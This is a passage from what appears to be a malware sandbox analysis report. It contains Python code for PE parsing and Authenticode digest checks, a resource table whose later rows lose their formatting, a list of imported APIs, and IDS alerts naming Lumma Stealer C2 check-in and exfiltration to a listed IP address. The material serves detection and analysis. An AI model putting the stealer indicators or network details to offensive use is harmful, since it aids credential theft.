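            "<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "raw_ptr": raw_ptr, "characteristics": chars,
                         "md5": hashlib.md5(raw).hexdigest(), "entropy": shannon_entropy(raw)})
    # checksum_off and secdir_off are the two header fields Authenticode leaves out of its hash.
    return {"dirs": dirs, "sections": sections, "size_of_headers": size_of_headers,
            "checksum_off": opt + 64, "secdir_off": dir_base + 8 * 4}

def section_for_rva(pe: dict, rva: int):
    """The 'Is in Section' column; None when no section's virtual range contains rva."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return s["name"]
    return None

def authenticode_digest(data: bytes, algo: str = "sha256") -> str:
    """Hash Authenticode signs: headers minus CheckSum and the SECURITY entry, sections in
    file order, then everything up to (but not including) the certificate table."""
    pe = parse_pe32(data)
    cs, sd, hdr_end = pe["checksum_off"], pe["secdir_off"], pe["size_of_headers"]
    h = hashlib.new(algo)
    h.update(data[:cs]); h.update(data[cs + 4:sd]); h.update(data[sd + 8:hdr_end])
    pos = hdr_end
    for s in sorted(pe["sections"], key=lambda s: s["raw_ptr"]):
        h.update(data[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]])
        pos = max(pos, s["raw_ptr"] + s["raw_size"])
    cert_off, cert_size = pe["dirs"]["SECURITY"]
    h.update(data[pos:cert_off if cert_size else len(data)])  # any overlay is hashed too
    return h.hexdigest()

def build_sample_pe() -> bytes:
    """Constructed two-section PE32 plus a dummy certificate table (sample data, not the analysed file)."""
    text = bytes(range(256)) * 2                # every byte value twice -> entropy exactly 8.0
    rdata = b"A" * 0x200                        # a single byte value   -> entropy 0.0
    cert = struct.pack("<IHH", 16, 0x200, 2) + b"\xAA" * 8   # fake WIN_CERTIFICATE header + body
    dirs = [(0, 0)] * 16
    dirs[1] = (0x2000, 0x40)                    # IMPORT: an RVA inside .rdata
    dirs[4] = (0x600, len(cert))                # SECURITY: a file offset, not an RVA
    opt = struct.pack("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII", 0x10B, 6, 0, len(text), len(rdata), 0,
                      0x1000, 0x1000, 0x2000, 0x400000, 0x1000, 0x200, 4, 0, 4, 0, 4, 0,
                      0, 0x3000, 0x200, 0, 2, 0, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    hdr = (b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40) + b"PE\0\0"
           + struct.pack("<HHIIIHH", 0x14C, 2, 0x676BB07E, 0, 0, len(opt), 0x102) + opt
           + struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
           + struct.pack("<8sIIIIIIHHI", b".rdata", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0x40000040))
    return hdr.ljust(0x200, b"\0") + text + rdata + cert

def digest_experiments() -> dict:
    """Which edits change the signed digest: why a borrowed cert block ends in TRUST_E_BAD_DIGEST."""
    good = build_sample_pe()
    base = authenticode_digest(good)
    cksum_off = parse_pe32(good)["checksum_off"]
    other_cert = good[:0x600] + struct.pack("<IHH", 16, 0x200, 2) + b"\xBB" * 8
    body = bytearray(good); body[0x210] ^= 0xFF                      # one byte inside .text
    cksum = bytearray(good); struct.pack_into("<I", cksum, cksum_off, 0x1234)
    return {"cert_swap_keeps_digest": authenticode_digest(other_cert) == base,
            "checksum_keeps_digest": authenticode_digest(bytes(cksum)) == base,
            "body_patch_keeps_digest": authenticode_digest(bytes(body)) == base}

if __name__ == "__main__":
    pe = parse_pe32(build_sample_pe())
    for s in pe["sections"]:
        print(f"{s['name']:<7} VA=0x{s['va']:x} raw=0x{s['raw_size']:x} md5={s['md5']} entropy={s['entropy']:.2f}")
    print(digest_experiments())
```

digest_experiments() makes the report's failure mode concrete: replacing the whole certificate blob leaves the digest unchanged, as does editing the CheckSum field, but flipping one byte of .text changes it, so a certificate block lifted from a legitimately signed NVIDIA binary can only ever verify against that binary's body. To check a real file, pass open(path, "rb").read() to parse_pe32 and authenticode_digest and compare the digest with the messageDigest inside the PKCS#7 blob at the SECURITY offset (parsing that blob is outside this example); on Windows, Get-AuthenticodeSignature or signtool verify /v report the same TRUST_E_BAD_DIGEST outcome.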
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x299190 | 0x134 | data | English | United States | 0.37337662337662336
RT_CURSOR | 0x2992e0 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.6298701298701299
RT_CURSOR | 0x299430 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.5292207792207793
RT_CURSOR | 0x299580 | 0x134 | Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001" | English | United States | 0.487012987012987
RT_CURSOR | 0x2996d0 | 0x134 | Targa image data - RGB 64 x 65536 x 1 +32 "\001" | English | United States | 0.4805194805194805
RT_CURSOR | 0x299808 | 0xb4 | Targa image data - Map 32 x 65536 x 1 +16 "\001" | English | United States | 0.7
RT_BITMAP | 0x2691e0 | 0x4828 | Device independent bitmap graphic, 96 x 48 x 32, image size 18432, resolution 4379 x 4379 px/m | English | United States | 0.055381117366825466
RT_BITMAP | 0x275030 | 0x9c8 | Device independent bitmap graphic, 240 x 20 x 4, image size 2400 | English | United States | 0.06988817891373802
RT_BITMAP | 0x263c10 | 0x5128 | Device independent bitmap graphic, 216 x 24 x 32, image size 20736, resolution 18142 x 18142 px/m | English | United States | 0.1476703889102811
RT_BITMAP | 0x277108 | 0xe8 | Device independent bitmap graphic, 16 x 16 x 4, image size 128 | English | United States | 0.29310344827586204
RT_BITMAP | 0x26dbe0 | 0x6c28 | Device independent bitmap graphic, 288 x 24 x 32, image size 27648, resolution 2835 x 2835 px/m | English | United States | 0.05226090725223924
RT_BITMAP | 0x2759f8 | 0x628 | Device independent bitmap graphic, 32 x 12 x 32, image size 1536, resolution 226743 x 226743 px/m | English | United States | 0.11294416243654823
RT_BITMAP | 0x274808 | 0x828 | Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 18898 x 18898 px/m | English | United States | 0.09434865900383142
RT_BITMAP | 0x268d38 | 0x4a8 | Device independent bitmap graphic, 24 x 12 x 32, image size 1152, resolution 18142 x 18142 px/m | English | United States | 0.1610738255033557
RT_BITMAP | 0x2603c0 | 0x3028 | Device independent bitmap graphic, 96 x 32 x 32, image size 12288, resolution 3309 x 3309 px/m | English | United States | 0.06878650227125244
RT_BITMAP | 0x26da08 | 0x1d8 | Device independent bitmap graphic, 12 x 12 x 24, image size 432 | English | United States | 0.13347457627118645
RT_BITMAP | 0x2633e8 | 0x828 | Device independent bitmap graphic, 32 x 16 x 32, image size 2048, resolution 91169 x 91169 px/m | English | United States | 0.15373563218390804
RT_BITMAP | 0x276c48 | 0x2c8 | Device independent bitmap graphic, 12 x 14 x 32, image size 672, resolution 18142 x 18142 px/m | English | United States | 0.0800561797752809
RT_BITMAP | 0x276f10 | 0x1f8 | Device independent bitmap graphic, 80 x 10 x 4, image size 400 | English | United States | 0.31547619047619047
RT_BITMAP | 0x2771f0 | 0x9c8 | Device independent bitmap graphic, 28 x 22 x 32, image size 2464, resolution 2835 x 2835 px/m | English | United States | 0.04033546325878594
RT_BITMAP | 0x28d4a8 | 0x1228 | Device independent bitmap graphic, 48 x 24 x 32, image size 4608, resolution 2835 x 2835 px/m | English | United States | 0.08067986230636832
RT_BITMAP | 0x276020 | 0xc28 | Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 3309 x 3309 px/m | English | United States | 0.17898457583547558
RT_BITMAP | 0x277bb8 | 0x3b8 | Device independent bitmap graphic, 12 x 19 x 32, image size 912, resolution 2835 x 2835 px/m | English | United States | 0.13130252100840337
RT_BITMAP | 0x277f70 | 0x2b48 | Device independent bitmap graphic, 120 x 23 x 32, image size 11040, resolution 2835 x 2835 px/m | English | United States | 0.032310469314079424
RT_BITMAP | 0x27aab8 | 0xc28 | Device independent bitmap graphic, 32 x 32 x 24, image size 3072 | English | United States | 0.046593830334190234
RT_BITMAP | 0x27b6e0 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/m | English | United States | 0.03667820069204152
RT_BITMAP | 0x27e408 | 0x2d28 | Device independent bitmap graphic, 120 x 24 x 32, image size 11520, resolution 2835 x 2835 px/m | English | United States | 0.01591695501730104
RT_BITMAP | 0x281130 | 0x628 | Device independent bitmap graphic, 32 x 16 x 24, image size 1536, resolution 2835 x 2835 px/m | English | United States | 0.15545685279187818
RT_BITMAP | 0x281758 | 0x5128 | Device independent bitmap graphic, 144 x 48 x 24, image size 20736, resolution 2835 x 2835 px/m | English | United States | 0.03176742395071236
RT_BITMAP | 0x286880 | 0x6c28 | Device independent bitmap graphic, 288 x 24 x 32, image size 27648, resolution 2835 x 2835 px/m | English | United States | 0.034563709910430514
RT_BITMAP | 0x28e6d0 | 0x48 | Device independent bitmap graphic, 1 x 8 x 32, image size 32, resolution 2835 x 2835 px/m | English | United States | 0.4166666666666667
RT_BITMAP | 0x28e718 | 0xca8 | Device independent bitmap graphic, 80 x 10 x 32, image size 3200, resolution 2835 x 2835 px/m | English | United States | 0.06419753086419754
RT_BITMAP | 0x28f3c0 | 0xc28 | Device independent bitmap graphic, 48 x 16 x 32, image size 3072, resolution 3309 x 3309 px/m | English | United States | 0.17030848329048842
RT_BITMAP | 0x2998e8 | 0x5e4 | Device independent bitmap graphic, 70 x 39 x 4, image size 1404 | English | United States | 0.34615384615384615
RT_BITMAP | 0x299fb8 | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | English | United States | 0.44565217391304346
RT_BITMAP | 0x29a070 | 0x16c | Device independent bitmap graphic, 39 x 13 x 4, image size 260 | English | United States | 0.28296703296703296
RT_BITMAP | 0x29a1e0 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | English | United States | 0.37962962962962965
RT_ICON | 0x250980 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States | 0.0547945205479452
RT_ICON | 0x254ba8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.0979253112033195
RT_ICON | 0x257150 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.10553470919324578
RT_ICON | 0x2581f8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.22340425531914893
RT_ICON | 0x2586a0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States | 0.0547945205479452
RT_ICON | 0x25c8c8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | United States | 0.0979253112033195
RT_ICON | 0x25ee70 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.10553470919324578
RT_ICON | 0x25ff18 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.22340425531914893
RT_MENU | 0x290018 | 0x4f4 | data | English | United States | 0.3383280757097792
RT_MENU | 0x290510 | 0xa36 | data | English | United States | 0.2620504973221117
RT_DIALOG | 0x2914c0 | 0x2c8 | data | English | United States | 0.5196629213483146
RT_DIALOG | 0x2947c8 | 0x4d0 | data | English | United States | 0.4074675324675325
RT_DIALOG | 0x292318 | 0x290 | data | English | United States | 0.46646341463414637
RT_DIALOG | 0x291170 | 0x34e | data | English | United States | 0.45271867612293143
RT_DIALOG | 0x291d90 | 0x582 | data | English | United States | 0.4049645390070922
RT_DIALOG | 0x2931c0 | 0x30e | data | English | United States | 0.4833759590792839
RT_DIALOG | 0x293858 | 0x394 | data | English | United States | 0.4585152838427948
RT_DIALOG | 0x2925a8 | 0x542 | data | English | United States | 0.38781575037147104
RT_DIALOG | 0x2918a8 | 0x4e6 | data | English | United States | 0.386762360446571
RT_DIALOG | 0x2936f8 | 0x160 | data | English | United States | 0.625
RT_DIALOG | 0x292af0 | 0x19e | data | English | United States | 0.5942028985507246
RT_DIALOG | 0x295e68 | 0x316 | data | English | United States | 0.49746835443037973
RT_DIALOG | 0x292c90 | 0x418 | data | English | United States | 0.40553435114503816
RT_DIALOG | 0x2934d0 | 0x222 | data | English | United States | 0.5842490842490843
RT_DIALOG | 0x2942a0 | 0x528 | data | English | United States | 0.4287878787878788
RT_DIALOG | 0x291788 | 0x11a | data | English | United States | 0.6453900709219859
RT_DIALOG | 0x290f80 | 0x1ea | data | English | United States | 0.6122448979591837
RT_DIALOG | 0x2930a8 | 0x112 | data | English | United States | 0.6423357664233577
RT_DIALOG | 0x293bf0 | 0x336 | data | English | United States | 0.4781021897810219
RT_DIALOG | 0x293f28 | 0x184 | data | English | United States | 0.5438144329896907
RT_DIALOG | 0x2940b0 | 0x1ee | data | English | United States | 0.5323886639676113
RT_DIALOG | 0x294c98 | 0x5a6 | data | English | United States | 0.39557399723374825
RT_DIALOG | 0x295240 | 0x54a | data | English | United States | 0.39807976366322007
RT_DIALOG | 0x295790 | 0x362 | data | English | United States | 0.4457274826789838
RT_DIALOG | 0x295af8 | 0x36a | data | English | United States | 0.43592677345537756
RT_DIALOG | 0x296180 | 0x598 | data | English | United States | 0.4155027932960894
RT_DIALOG | 0x296718 | 0x238 | data | English | United States | 0.4841549295774648
RT_DIALOG | 0x296950 | 0x102 | data | English | United States | 0.6550387596899225
RT_DIALOG | 0x296a58 | 0x130 | data | English | United States | 0.625
RT_DIALOG | 0x296b88 | 0x1ee | data | English | United States | 0.5263157894736842
RT_DIALOG | 0x296d78 | 0x184 | data | English | United States | 0.5438144329896907
RT_DIALOG | 0x296f00 | 0x238 | data | English | United States | 0.4841549295774648
RT_DIALOG | 0x297138 | 0x4d0 | data | English | United States | 0.4074675324675325
RT_DIALOG | 0x297608 | 0x598 | data | English | United States | 0.4155027932960894
RT_DIALOG | 0x297ba0 | 0x418 | data | English | United States | 0.40553435114503816
RT_DIALOG | 0x299ed0 | 0xe8 | data | English | United States | 0.6336206896551724
RT_STRING | 0x29a328 | 0xea | data | English | United States | 0.38461538461538464
RT_STRING | 0x29a770 | 0x1d2 | data | English | United States | 0.3605150214592275
RT_STRING | 0x29af00 | 0x1ba | data | English | United States | 0.38009049773755654
RT_STRING | 0x29b260 | 0x150 | Matlab v4 mat-file (little endian) E, numeric, rows 0, columns 0 | English | United States | 0.40476190476190477
RT_STRING | 0x29b3b0 | 0x1d8 | data | English | United States | 0.4279661016949153
                                                                                                                      RT_STRING0x29b0c00x19adataEnglishUnited States0.4170731707317073
                                                                                                                      RT_STRING0x29ac380x2c8dataEnglishUnited States0.3061797752808989
                                                                                                                      RT_STRING0x29b5880x56Matlab v4 mat-file (little endian) d, numeric, rows 0, columns 0EnglishUnited States0.6511627906976745
                                                                                                                      RT_STRING0x29a9480x2ecdataEnglishUnited States0.3048128342245989
                                                                                                                      RT_STRING0x29b5e00x1fcdataEnglishUnited States0.24803149606299213
                                                                                                                      RT_STRING0x29a7400x2cLotus unknown worksheet or configuration, revision 0x25EnglishUnited States0.4772727272727273
                                                                                                                      RT_STRING0x29a4180x46dataEnglishUnited States0.6571428571428571
                                                                                                                      RT_STRING0x29a4600xd8dataEnglishUnited States0.5601851851851852
                                                                                                                      RT_STRING0x29a5380x78dataEnglishUnited States0.5916666666666667
                                                                                                                      RT_STRING0x29a5b00x124dataEnglishUnited States0.4246575342465753
                                                                                                                      RT_STRING0x29a6d80x62dataEnglishUnited States0.6530612244897959
                                                                                                                      RT_STRING0x29b7e00x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                      RT_STRING0x29b8680x2adataEnglishUnited States0.5476190476190477
                                                                                                                      RT_STRING0x29b8980x14adataEnglishUnited States0.5060606060606061
                                                                                                                      RT_STRING0x29b9e80x4e2dataEnglishUnited States0.376
                                                                                                                      RT_STRING0x29c2600x2a2dataEnglishUnited States0.28338278931750743
                                                                                                                      RT_STRING0x29bf800x2dcdataEnglishUnited States0.36885245901639346
                                                                                                                      RT_STRING0x29bed00xacdataEnglishUnited States0.45348837209302323
                                                                                                                      RT_STRING0x29cc380xdedataEnglishUnited States0.536036036036036
                                                                                                                      RT_STRING0x29c5080x4c4dataEnglishUnited States0.3221311475409836
                                                                                                                      RT_STRING0x29c9d00x264dataEnglishUnited States0.3741830065359477
                                                                                                                      RT_STRING0x29cd180x2cdataEnglishUnited States0.5227272727272727
                                                                                                                      RT_ACCELERATOR0x290f480x38dataEnglishUnited States0.875
                                                                                                                      RT_GROUP_CURSOR0x2995680x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2996b80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2992c80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2994180x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                      RT_GROUP_CURSOR0x2998c00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                      RT_GROUP_ICON0x2586600x3edataEnglishUnited States0.8225806451612904
                                                                                                                      RT_GROUP_ICON0x2603800x3edataEnglishUnited States0.8870967741935484
                                                                                                                      RT_VERSION0x297fb80x37cdataEnglishUnited States0.4439461883408072
                                                                                                                      RT_MANIFEST0x298fa80x1e7XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5503080082135524
                                                                                                                      None0x2987380x200dataEnglishUnited States0.482421875
                                                                                                                      None0x298b380x6adataEnglishUnited States0.7358490566037735
                                                                                                                      None0x2985380x200dataEnglishUnited States0.482421875
                                                                                                                      None0x2983380x200dataEnglishUnited States0.482421875
                                                                                                                      None0x2989380x200dataEnglishUnited States0.482421875
                                                                                                                      None0x298ba80x200dataEnglishUnited States0.482421875
                                                                                                                      None0x298da80x200dataEnglishUnited States0.482421875
                                                                                                                      None0x28ffe80x20dataEnglishUnited States1.1875
                                                                                                                      None0x2900080xadataEnglishUnited States1.6
DLL | Import
KERNEL32.dll | GetTimeZoneInformation, GetSystemTime, GetLocalTime, CreateThread, ExitThread, HeapSize, SetStdHandle, GetFileType, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetEnvironmentStrings, GetCommandLineW, GetCommandLineA, SetHandleCount, GetStdHandle, GetStartupInfoA, GetModuleFileNameA, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, IsBadWritePtr, CompareStringA, CompareStringW, SetUnhandledExceptionFilter, GetCurrentDirectoryA, LCMapStringA, LCMapStringW, IsBadReadPtr, IsBadCodePtr, GetCPInfo, IsValidLocale, IsValidCodePage, GetLocaleInfoA, EnumSystemLocalesA, GetUserDefaultLCID, GetStringTypeA, HeapReAlloc, GetDriveTypeA, GetLocaleInfoW, GetACP, GetOEMCP, SetEnvironmentVariableA, GetLastError, CreateMutexW, lstrcmpW, FreeLibrary, GetProcAddress, LoadLibraryW, GetModuleHandleW, lstrcpynW, GetVersionExW, lstrlenW, Sleep, GlobalUnlock, GlobalLock, GlobalAlloc, DeleteFileW, MoveFileW, CopyFileW, LocalFree, FormatMessageW, GetShortPathNameW, GetFileAttributesExW, CreateDirectoryW, GetTempPathW, GetCurrentProcess, GetPrivateProfileStringW, CloseHandle, GetExitCodeProcess, WaitForSingleObject, CreateProcessW, TerminateProcess, FreeConsole, InterlockedExchange, GetProfileStringA, GlobalAddAtomA, FindResourceA, GetDriveTypeW, RaiseException, HeapAlloc, HeapFree, RtlUnwind, ExitProcess, GetStartupInfoW, SetErrorMode, FindResourceExW, GetCurrentDirectoryW, SystemTimeToFileTime, LocalFileTimeToFileTime, FindNextFileW, GetProfileIntW, GetThreadLocale, GetStringTypeExW, GetVolumeInformationW, FindFirstFileW, FindClose, UnlockFile, LockFile, DuplicateHandle, TlsGetValue, LocalReAlloc, TlsSetValue, GlobalReAlloc, TlsFree, GlobalHandle, TlsAlloc, LocalAlloc, GetProcessVersion, GlobalFlags, lstrcmpiW, FileTimeToLocalFileTime, FileTimeToSystemTime, lstrcmpA, lstrcmpiA, GetCurrentThread, GlobalGetAtomNameW, CreateEventW, SuspendThread, SetEvent, LoadLibraryA, FindResourceW, GetVersion, lstrcatW, GetCurrentThreadId, GlobalAddAtomW, GlobalFindAtomW, GlobalDeleteAtom, lstrcpyW, GetDiskFreeSpaceW, GetFileTime, SetFileTime, GetFullPathNameW, GetTempFileNameW, GetFileAttributesW, lstrlenA, InterlockedDecrement, InterlockedIncrement, MulDiv, GetModuleHandleA, SetLastError, SetFilePointer, SizeofResource, LoadResource, GenerateConsoleCtrlEvent, LockResource, GlobalSize, GetFileSize, SetCurrentDirectoryW, GlobalFree, FlushFileBuffers, WriteFile, ReadFile, SetFilePointerEx, SetEndOfFile, GetFileSizeEx, CreateFileW, AreFileApisANSI, SetFileAttributesW, WritePrivateProfileStringW, GetPrivateProfileIntW, GetWindowsDirectoryW, GetTickCount, GetModuleFileNameW, MultiByteToWideChar, WideCharToMultiByte, ResumeThread, TerminateThread, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, DeleteCriticalSection, SetThreadPriority, AttachConsole, GetStringTypeW
USER32.dll | SetRectEmpty, wvsprintfW, EndDialog, CreateDialogIndirectParamW, GetActiveWindow, ValidateRect, WindowFromPoint, ShowWindow, MoveWindow, SetWindowTextW, IsDialogMessageW, IsDlgButtonChecked, SetDlgItemTextW, SetDlgItemInt, GetDlgItemInt, CheckDlgButton, SendDlgItemMessageW, SendDlgItemMessageA, MapWindowPoints, PeekMessageW, SetActiveWindow, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetTopWindow, IsChild, WinHelpW, GetClassInfoW, RegisterClassW, TrackPopupMenu, GetDlgItem, GetWindowTextLengthW, GetWindowTextW, DestroyWindow, SetWindowsHookExW, CallNextHookEx, CallWindowProcW, DefWindowProcW, GetMessageTime, GetMessagePos, GetForegroundWindow, IntersectRect, SystemParametersInfoW, GetWindowPlacement, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuW, SetMenuItemBitmaps, EnableMenuItem, GetNextDlgTabItem, wsprintfW, UnhookWindowsHookEx, EndPaint, BeginPaint, GetWindowDC, MessageBoxW, LoadAcceleratorsW, SetPropW, SetClassLongW, SetMenu, HideCaret, ShowCaret, ExcludeUpdateRgn, GetWindowTextA, DrawTextA, GetClassInfoA, DefDlgProcA, DefWindowProcA, DestroyMenu, GetMessageW, TranslateMessage, DispatchMessageW, GetMenuStringW, FindWindowW, ExitWindowsEx, EmptyClipboard, SetClipboardData, GetClipboardData, CloseClipboard, OpenClipboard, DrawFocusRect, ReleaseDC, KillTimer, SetTimer, ScreenToClient, TranslateAcceleratorW, ReuseDDElParam, UnpackDDElParam, BringWindowToTop, IsZoomed, PostQuitMessage, ShowOwnedPopups, RegisterClipboardFormatW, GetAsyncKeyState, MapDialogRect, SetRect, LoadStringW, GetClassNameW, GetSysColorBrush, CharUpperW, IsWindowEnabled, SetFocus, RegisterWindowMessageW, GetDlgCtrlID, SetWindowPos, GetMenu, GetMenuItemCount, GetMenuItemID, GetWindowLongW, SetWindowLongW, DeleteMenu, GetKeyState, OffsetRect, InflateRect, GetSysColor, GetFocus, BeginDeferWindowPos, EndDeferWindowPos, GetCursorPos, ReleaseCapture, GetCapture, ClientToScreen, SetCursorPos, PtInRect, SetCursor, CharNextA, CallWindowProcA, RemovePropA, SetWindowsHookExA, GetWindowLongA, SendMessageA, IsWindowUnicode, GetClassNameA, SetWindowLongA, SetPropA, GetPropA, SetCapture, GrayStringW, DrawTextW, TabbedTextOutW, IsClipboardFormatAvailable, PostThreadMessageW, SetParent, LockWindowUpdate, RemovePropW, GetDCEx, GetParent, GetDesktopWindow, GetWindow, GetPropW, IsIconic, GetLastActivePopup, UpdateWindow, TrackPopupMenuEx, InvalidateRect, IsWindowVisible, GetSystemMenu, InsertMenuW, CheckMenuItem, DestroyIcon, LoadIconW, LoadImageW, GetDC, CopyRect, GetWindowRect, PostMessageW, IsWindow, LoadMenuW, GetClientRect, GetSubMenu, SetMenuDefaultItem, GetSystemMetrics, SendMessageW, SetForegroundWindow, EnableWindow, DestroyCursor, LoadBitmapW, LoadCursorW, GetWindowTextLengthA, UnregisterClassW, CreateWindowExW
GDI32.dll | SetMapMode, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, ExcludeClipRect, IntersectClipRect, GetDeviceCaps, CreateSolidBrush, CreatePatternBrush, SetRectRgn, GetCharWidthW, CreateFontW, GetTextMetricsW, EnumFontFamiliesExW, CopyMetaFileW, CreateRectRgn, CombineRgn, SetTextColor, SetBkMode, SetBkColor, SaveDC, GetClipBox, CreateRectRgnIndirect, ExtSelectClipRgn, SetStretchBltMode, StretchDIBits, SetDIBitsToDevice, RestoreDC, CreateDIBSection, DeleteDC, PatBlt, DeleteObject, SelectObject, GetBkMode, GetTextExtentPoint32W, GetBkColor, GetTextColor, BitBlt, Escape, ExtTextOutW, TextOutW, RectVisible, PtVisible, CreateCompatibleBitmap, CreateCompatibleDC, CreateBitmap, GetStockObject, GetObjectW, ExtTextOutA, GetTextExtentPointA, CreateDIBitmap, CreateFontIndirectW
comdlg32.dll | GetFileTitleW, GetSaveFileNameW, GetOpenFileNameW
WINSPOOL.DRV | OpenPrinterW, DocumentPropertiesW, ClosePrinter
ADVAPI32.dll | RegQueryValueW, RegSetValueExW, RegCreateKeyW, RegSetValueW, RegDeleteKeyW, RegEnumKeyW, RegOpenKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegQueryValueExW, RegCreateKeyExW, RegDeleteValueW, SetFileSecurityW, GetFileSecurityW, RegCloseKey
SHELL32.dll | DragAcceptFiles, ShellExecuteW, DragQueryFileW, SHGetSpecialFolderPathW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetMalloc, SHGetDesktopFolder, SHFileOperationW, ExtractIconW, SHGetFileInfoW, DragFinish
COMCTL32.dll | ImageList_DragLeave, ImageList_DragEnter, ImageList_BeginDrag, ImageList_DragMove, ImageList_GetImageInfo, ImageList_Draw, ImageList_AddMasked, ImageList_EndDrag, _TrackMouseEvent, ImageList_SetBkColor, ImageList_Destroy, ImageList_Create, PropertySheetW, DestroyPropertySheetPage, CreatePropertySheetPageW, ImageList_DrawIndirect, ImageList_GetImageCount
oledlg.dll | OleUIBusyW
ole32.dll | CoTaskMemAlloc, RevokeDragDrop, OleDuplicateData, RegisterDragDrop, OleGetClipboard, ReleaseStgMedium, CoFreeUnusedLibraries, OleUninitialize, OleInitialize, CoInitialize, CoCreateInstance, CoUninitialize, CoCreateGuid, OleIsCurrentClipboard, CoRegisterMessageFilter, CoRevokeClassObject, CoLockObjectExternal, OleFlushClipboard
OLEAUT32.dll | SysFreeString, SysAllocString, VariantClear, VarBstrFromDate
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
SHLWAPI.dll | PathGetCharTypeW, PathIsRootW, PathRemoveFileSpecW, PathIsURLW, PathFindExtensionW, PathFileExistsW, PathIsDirectoryW, PathFindFileNameW
WINHTTP.dll | WinHttpOpenRequest, WinHttpCrackUrl, WinHttpAddRequestHeaders, WinHttpReadData, WinHttpCloseHandle, WinHttpSendRequest, WinHttpSetOption, WinHttpQueryOption, WinHttpQueryHeaders, WinHttpOpen, WinHttpConnect, WinHttpReceiveResponse
Language of compilation system | Country where language is spoken
English | United States


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-05T18:53:29.307820+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49769 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:30.081192+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49769 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:30.081192+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49769 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:31.283423+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49778 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:31.755774+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49778 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:31.755774+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49778 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:32.557598+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49788 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:33.713035+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49799 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:41.657467+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49799 | 172.67.178.174 | 443 | TCP
